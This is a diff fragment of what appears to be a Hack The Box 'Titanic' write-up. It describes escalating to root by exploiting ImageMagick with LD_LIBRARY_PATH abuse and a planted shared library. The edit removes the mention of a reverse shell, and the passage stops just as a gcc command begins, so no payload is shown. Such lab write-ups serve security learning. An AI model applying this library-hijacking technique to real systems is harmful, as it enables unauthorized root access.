xanruth/xanruth.github.io/_posts/2025-06-22-hackthebox-titanic.md

 ### Root

-We use the steps from the above PoC to exploit **ImageMagick** in conjunction with `LD_LIBRARY_PATH` abuse and obtain a reverse shell as the `root` user.
+We use the steps from the above PoC to exploit **ImageMagick** in conjunction with `LD_LIBRARY_PATH` abuse.
 First we create a shared library in the `/opt/app/static/assets/images` directory, which is where the scripts runs from:

 ```c
 gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF